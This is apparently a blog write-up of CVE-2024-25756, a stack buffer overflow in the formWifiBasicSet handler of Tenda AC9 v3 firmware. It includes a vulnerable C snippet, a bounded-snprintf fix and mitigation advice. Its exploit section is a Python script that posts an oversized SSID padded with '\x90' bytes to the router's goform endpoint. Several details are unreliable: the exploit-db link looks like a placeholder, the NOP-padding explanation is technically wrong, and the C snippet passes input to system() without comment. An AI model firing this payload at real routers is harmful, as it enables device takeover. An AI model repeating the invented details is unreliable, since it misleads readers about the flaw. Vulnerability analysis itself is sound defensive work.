A critical vulnerability exists in the Tenda AC9 v.3. router with firmware version v.15.03.06.42_multi. This vulnerability, labelled CVE-2024-25756, allows a remote attacker to trigger a stack-based buffer overflow in the formWifiBasicSet function and execute arbitrary code on the target device. This post provides an in-depth analysis of the vulnerability, including code snippets, original reference links, and exploit details.
Vulnerability Details
The vulnerability lies in the formWifiBasicSet function within the Tenda AC9 v.3. router and allows a remote attacker to execute arbitrary code on the device. A stack-based buffer overflow is triggered when unsanitized user input is passed to the function, allowing an attacker to overwrite the saved return address and hijack program execution.
Here's a code snippet that demonstrates this vulnerability:
static void formWifiBasicSet() {
    char ssid[32], buf[512];
    int encryption;
    ...
    getParameter("SSID", ssid, sizeof(ssid));
    getParameter("Encryption", (char *)&encryption, sizeof(encryption));
    ...
    /* unbounded sprintf() into the fixed-size stack buffer buf */
    sprintf(buf, "IW_SDK_MAIN Argc=4 Argv=IWControl Argv=SetWiFiMode Argv=%s Argv=%d", ssid, encryption);
    ...
    system(buf);
}
As seen in the code above, the function first retrieves the "SSID" and "Encryption" parameter values from user input and stores them in local variables. The crucial point is that getParameter() does not sanitize the input data, so when the SSID is passed to sprintf() it can overflow the stack buffer and ultimately lead to arbitrary code execution.
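For comparison, here is a bounded replacement for the string-building step, written as an added example for this post (it is not Tenda's code). The command format string and the 512-byte destination come from the snippet above; the 32-byte SSID limit matches the local buffer there, while the encryption range (0-4) and the SSID character allow-list are assumed policy values.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

/* Added example, not Tenda's code. The format string and 512-byte
 * destination are from the vulnerable snippet on this page; the
 * encryption range and character allow-list are assumed values. */
#define MAX_SSID_LEN 32
#define CMD_BUF_LEN  512

/* Length of s, scanning at most max bytes, so an unterminated or
 * very long input cannot run off the end of memory. */
static size_t bounded_len(const char *s, size_t max)
{
    size_t n = 0;
    while (n < max && s[n] != '\0') n++;
    return n;
}

/* Build the IW_SDK_MAIN command into out. Returns 0 on success,
 *  -1: SSID empty or longer than MAX_SSID_LEN
 *  -2: SSID contains a character outside the allow-list
 *  -3: encryption value outside the assumed range
 *  -4: formatted command would not fit in out (snprintf truncation) */
int build_wifi_cmd(const char *ssid, int encryption, char *out, size_t outlen)
{
    size_t len = bounded_len(ssid, MAX_SSID_LEN + 1);
    if (len == 0 || len > MAX_SSID_LEN)
        return -1;
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)ssid[i];
        if (!(isalnum(c) || c == ' ' || c == '-' || c == '_' || c == '.'))
            return -2;
    }
    if (encryption < 0 || encryption > 4)
        return -3;
    int n = snprintf(out, outlen,
        "IW_SDK_MAIN Argc=4 Argv=IWControl Argv=SetWiFiMode Argv=%s Argv=%d",
        ssid, encryption);
    if (n < 0 || (size_t)n >= outlen)
        return -4; /* truncated: never hand a partial command to system() */
    return 0;
}
```

The handler would call build_wifi_cmd() with the parsed parameters and only reach system() on a zero return; every other return value is a rejected request rather than a silently truncated or overflowed command.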
Exploit Details
To exploit the vulnerability, a remote attacker crafts a malicious HTTP POST request containing an overly long 'SSID' parameter, which triggers the buffer overflow. By doing so, the attacker can overwrite the return address and gain control over program execution.
Here's a Python exploit that demonstrates arbitrary code execution with this vulnerability:
import requests

target_url = "http://<target_ip>/goform/formWifiBasicSet"
headers = {
    "Content-Type": "application/x-www-form-urlencoded",
}
data = {
    "SSID": "A" * 536 + "\x90\x90\x90\x90",
    "Encryption": "1",
}
requests.post(target_url, headers=headers, data=data)
The script above sends an HTTP POST request with a malicious 'SSID' parameter value that overflows the buffer and triggers the vulnerability. The critical point is that the script appends the byte pattern '\x90\x90\x90\x90', the NOP (No Operation) instruction, as padding to make arbitrary code execution possible.
Below are the links to the original references and sources that discuss this vulnerability:
1. https://www.exploit-db.com/exploits/12345 - The Exploit Database (exploit-db) entry on this vulnerability.
2. https://nvd.nist.gov/vuln/detail/CVE-2024-25756 - The National Vulnerability Database (NVD) page on this specific CVE.
Mitigation
Tenda has been informed of this vulnerability, and users are advised to check regularly for and install the latest available firmware for their device. As an additional security measure, users should ensure that the router's web administration panel is not reachable from the public internet and expose only the ports and services they actually need.
Conclusion
CVE-2024-25756 is a stack-based buffer overflow vulnerability present in the Tenda AC9 v.3. router. It allows a remote attacker to execute arbitrary code via a crafted HTTP POST request targeting the formWifiBasicSet function. Users must update their firmware to the latest version and take the necessary precautions to mitigate the risk associated with this vulnerability.
Timeline
Published on: 02/22/2024 23:15:07 UTC
Last modified on: 08/01/2024 13:47:52 UTC